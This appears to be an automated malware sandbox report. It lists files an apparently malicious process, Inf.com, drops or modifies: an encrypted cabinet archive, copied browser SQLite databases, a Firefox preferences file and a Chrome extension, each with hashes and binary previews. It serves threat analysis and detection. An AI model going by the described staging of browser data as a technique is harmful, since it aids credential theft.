                                                                                                                                                                                                                                                                                                  Preview:.....M..E.E..u.E...._....M....^..j......j.h..L......e...MZ..f9...@.u].<.@.....@.PE..uL.....f9...@.u>.E....@.+.PQ.^...YY..t'.x$.|!.E..........E..3.8..........e..E.....2..M.d......Y_^[..U.........t..}..u.3....M...].U..=..M..t..}..u..u..."...u..[,..YY..].U....L...3...M.....u.....u...!....h..M..l!..Y..Y....#E.].U...u.......Y....H].U...u..Q...Y].."...j......Y..t.hL.B......Y3..j..S....U..j.h3'D.d.....PSVW...L.3.P.E.d.....h....h..M...8.I.h..J.....I.....u.h,.J.....I...........hH.J.V....I.hd.J.V......I.h..J.V......I.....t8..t4..t0.%(.M....h$.M.....I...W....V.,.M..y...YY.0.M...3.PPj.P....I..(.M...t..M.d......Y_^[..j..d....h..M...<.I..(.M...t.P..`.I..U..V...M.V..h.I.....L..E.A....L.V..d.,.....@.M.......L.........\.I.^].R...U..VW...M.W..h.I..u..>.u.....)jd.o...Y..>.t.d.,.....@.M.......L.......W..\.I._^].(.M...u%V.5..L...350.M......h$.M.......I...^.P....I..5(.M...H.I..U..=(.M..Vu,.5..L....u.35,.M....h..M...h$.M.......I....$...M.V..\.I.j..u..5(.M...L.I.V..h.I.^].Vj... .......P......3"

                                                                                                                                                                                                                                                                                                  C:\ProgramData\9HDT0HDBIMOZ\IEUAAI

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, 487443 bytes, 11 files, at 0x2c +A "Proceedings" +A "Recovery", ID 8198, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):487443
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.998124391538459
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:12288:B+S9oU3XWMHVIx884xmjdmLlSM7DGRgpqb7ITX:AeoUnW1xbAlSM3BpqATX
                                                                                                                                                                                                                                                                                                  MD5:3E6C9EC6F7CFD6FF9E44415233734692
                                                                                                                                                                                                                                                                                                  SHA1:C9E302D20AADC02EEF66CCB7E0562C9D5AAD1FAE
                                                                                                                                                                                                                                                                                                  SHA-256:59F56DFCFF7617579EC1940D61BF2AF6EFA6DD90D0849F9B658FF56859A118B9
                                                                                                                                                                                                                                                                                                  SHA-512:4467EDF1AEE44166B6D7356E3A4C91AF1F38C6934F06EC6C63EA778E96190061F05759C9AC2366AA364A35AFDBE1ED6478AFAFAC7A62EA9BA3CC153AA2E35518
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MSCF.....p......,................ ..6..................YN- .Proceedings..X.........YN- .Recovery..X...L.....YN- .Sunglasses............YN- .Division...........YN- .Cultural...........YN- .Tulsa...........YN- .Being...........YN- .Name...........YN- .Subtle.....[......YN- .Silicon.....[|.....YN- .Webster.....S..CK..T..8|7{......`.Q.....&.h..MP..Cv...*.q.O.v%VB.w.2...-*V.bl.}hK.JP...IP...FB5V.3qS..a...=..M.}.....x.s..33g.93.+Is.........W.I..)A.z..|I...........b..&.....a$.],IU5.p.....!.qLy.Rvf..b.+'b.-f.|T=.._0.8>....-F./....Pc$L].9~..+..k?..{0a.%.1. ...!.;...R....x..F..u..E..1g.9....9....9.s.j......6...8^ ..4.FI...`b<)E...b..I.e>.*.Q..`.'YD.%.m0!....RR.6h.'..*J.....qG.$.A./P.......~=..{...o..'HR.I...(K...-P...$..,.`..M..j.C...z..A.....)&u#.X .u....!...J....4I.V...^....P.......*..3...?.B[..G.d...Oa>.[ge...Kc......$..J..,X....|../...3....1.b.Z.\.k.H...q.......C..Y..-..:....K.Q..n...EM.3.....-.Y..m<...6.................!..S...J.a.}..%=G...L.n..P

                                                                                                                                                                                                                                                                                                  C:\ProgramData\9HDT0HDBIMOZ\L68GDJMO8

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\ProgramData\9HDT0HDBIMOZ\LNOHDB

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9504
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.512408163813622
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                                                                                                                                  MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                                                                                                                                  SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                                                                                                                                  SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                                                                                                                                  SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                                  C:\ProgramData\9HDT0HDBIMOZ\N7QIMY

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):294912
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.08438200565341271
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
                                                                                                                                                                                                                                                                                                  MD5:F7EEE7B0D281E250D1D8E36486F5A2C3
                                                                                                                                                                                                                                                                                                  SHA1:309736A27E794672BD1BDFBAC69B2C6734FC25CE
                                                                                                                                                                                                                                                                                                  SHA-256:378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
                                                                                                                                                                                                                                                                                                  SHA-512:CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\ProgramData\9HDT0HDBIMOZ\PHLFC2

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\ProgramData\9HDT0HDBIMOZ\VA1VKF

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4814
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.909739359753065
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
                                                                                                                                                                                                                                                                                                  MD5:6E6FE97CBC259DB47CD8423141CF35A3
                                                                                                                                                                                                                                                                                                  SHA1:EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
                                                                                                                                                                                                                                                                                                  SHA-256:1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
                                                                                                                                                                                                                                                                                                  SHA-512:9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Cr24....t.........0.."0...*.H.............0.........,.*i....9M..uEW....}.n..u..._3.08.:D.e]..'J...........l..)8`....:..P}........p..w(...v...Cm@....6..8...$._v....#a(.p..o:..=.....ef.C....M+.s.0g..@.'4.$ZN..e.....T.. ...F..;Sij[...&ZTH[.].D.z. ...A..<z...Ti....&..Z&u....D......\un.....................mR...B[.r..X...;.R..*Y...j...x...3.9.h...R.L....a....V%[.W_/v.A}.VV....H..1..s.9lH.7...M..^.|.C5...#..`...dJ.."..8....w......L../.........w....v.A....0..P....JU...~.-..[....K.d..i%.7....?].......1RiP..A.... ...b ...V2............f._~....IH.c.......0.."0...*.H.............0.........]......N..h...A..LY.*..%.s.....d..h#-/.U.I9..,.<.O1.)7.l.:W2..: ...E...2..s..W..T..|3.....W*S2N}.0g...T...b.q..wp.u....Z...)..2e}.r...!.u......@A..A..g.<.+:....m..[.....4..C&...*.."..}/9y%.....*..m..,.y...1...<=."eyI.G.@.3..=.....(.-...M..8A........q......:...L`\.q..?Rn.W/.\a...g...).....Q...8....*.*.J5.Z.~....0.Lt|...d....D......=...}A3bG.Ra.oyZ..BP..,t./.0...w..WA.p.

                                                                                                                                                                                                                                                                                                  C:\ProgramData\9HDT0HDBIMOZ\VKNG4E

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4814
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.909739359753065
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
                                                                                                                                                                                                                                                                                                  MD5:6E6FE97CBC259DB47CD8423141CF35A3
                                                                                                                                                                                                                                                                                                  SHA1:EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
                                                                                                                                                                                                                                                                                                  SHA-256:1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
                                                                                                                                                                                                                                                                                                  SHA-512:9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Cr24....t.........0.."0...*.H.............0.........,.*i....9M..uEW....}.n..u..._3.08.:D.e]..'J...........l..)8`....:..P}........p..w(...v...Cm@....6..8...$._v....#a(.p..o:..=.....ef.C....M+.s.0g..@.'4.$ZN..e.....T.. ...F..;Sij[...&ZTH[.].D.z. ...A..<z...Ti....&..Z&u....D......\un.....................mR...B[.r..X...;.R..*Y...j...x...3.9.h...R.L....a....V%[.W_/v.A}.VV....H..1..s.9lH.7...M..^.|.C5...#..`...dJ.."..8....w......L../.........w....v.A....0..P....JU...~.-..[....K.d..i%.7....?].......1RiP..A.... ...b ...V2............f._~....IH.c.......0.."0...*.H.............0.........]......N..h...A..LY.*..%.s.....d..h#-/.U.I9..,.<.O1.)7.l.:W2..: ...E...2..s..W..T..|3.....W*S2N}.0g...T...b.q..wp.u....Z...)..2e}.r...!.u......@A..A..g.<.+:....m..[.....4..C&...*.."..}/9y%.....*..m..,.y...1...<=."eyI.G.@.3..=.....(.-...M..8A........q......:...L`\.q..?Rn.W/.\a...g...).....Q...8....*.*.J5.Z.~....0.Lt|...d....D......=...}A3bG.Ra.oyZ..BP..,t./.0...w..WA.p.

                                                                                                                                                                                                                                                                                                  C:\ProgramData\9HDT0HDBIMOZ\VS0HVS

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1998ce55-ab80-4082-8d99-1e290513f14f.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):44596
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096735953059218
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBVwuwhDO6vP6O2lIY89giDPFs9XFwcGoup1Xl3jVu:z/Ps+wsI7ynEn6W/83chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:8503EFB3B0FEC700BBD5EB179C003218
                                                                                                                                                                                                                                                                                                  SHA1:A74CF29A9BFB3044D62F7EB7A13457C7F1DB4FAB
                                                                                                                                                                                                                                                                                                  SHA-256:B435356CE1710F4FF7B6E0FE5052AFC6EBCA38CD4512E83864B5F2D841B4D2FB
                                                                                                                                                                                                                                                                                                  SHA-512:CB6D770FD8C97CAF15F195F48C59EC8F896EE905BC7EB8887F34E7EAE4964E9E25404B26756CAB510ABCFCBDF7D8B446F8A6C274D6CA557AFA00A48589B882B1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\30d049e0-6634-4cb0-a45a-e04b90cbb21a.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):43746
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.0952459646356445
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBdwuihDO6vP6OgdpElQM4vcGoup1Xl3jVzXr4CCA8:z/Ps+wsI7ynEh6AUechu3VlXr4CRo5
                                                                                                                                                                                                                                                                                                  MD5:32A00C0FF7229CED1B31D2693BADEA77
                                                                                                                                                                                                                                                                                                  SHA1:BAA825E259995C2BB45E925C0D0108F07D401937
                                                                                                                                                                                                                                                                                                  SHA-256:982491D3A02EB78AA4D1D4BFCC821BEED8D8D4300DC67909DCEF8A5D21C8D7AD
                                                                                                                                                                                                                                                                                                  SHA-512:DF10BFEB147403E287D6920B3463841749209B6BB4B9AE905A1A1CAA0AF06AD2EEF7843CF0CB958E8A7BD0596B901A72769F8A2890194B3C621C77869F844460
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\431c7035-5805-42f5-9919-de8cf6f06c20.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):44596
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096429768973822
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBVwuwhDO6vP6O2lIY8lniuFV5JcGoup1Xl3jVzXr2:z/Ps+wsI7ynEn6W/8Bchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:2C4C4744A156AE1231DFCF2326B7C5A2
                                                                                                                                                                                                                                                                                                  SHA1:42B9F602F4B3530C080CAF7064CBC9039AC31664
                                                                                                                                                                                                                                                                                                  SHA-256:4773BCEFB2502E9BBF40D315BA71737A98C6EBD777AE0BFE7DD41F817725A727
                                                                                                                                                                                                                                                                                                  SHA-512:EC8F015569DF10929561873AB4CFDE3F7E7844F4CB0B2A93913B9AEE9BCD39CCFC7B9D959DE6085B7C4CDFBEC7F7E46553FC2C61746337DDCA2C7BA9166FEE71
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6a441db5-e8a8-485e-905c-8ba007982441.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44596
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096429768973822
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBVwuwhDO6vP6O2lIY8lniuFV5JcGoup1Xl3jVzXr2:z/Ps+wsI7ynEn6W/8Bchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:2C4C4744A156AE1231DFCF2326B7C5A2
                                                                                                                                                                                                                                                                                                  SHA1:42B9F602F4B3530C080CAF7064CBC9039AC31664
                                                                                                                                                                                                                                                                                                  SHA-256:4773BCEFB2502E9BBF40D315BA71737A98C6EBD777AE0BFE7DD41F817725A727
                                                                                                                                                                                                                                                                                                  SHA-512:EC8F015569DF10929561873AB4CFDE3F7E7844F4CB0B2A93913B9AEE9BCD39CCFC7B9D959DE6085B7C4CDFBEC7F7E46553FC2C61746337DDCA2C7BA9166FEE71
                                                                                                                                                                                                                                                                                                  Malicious:false
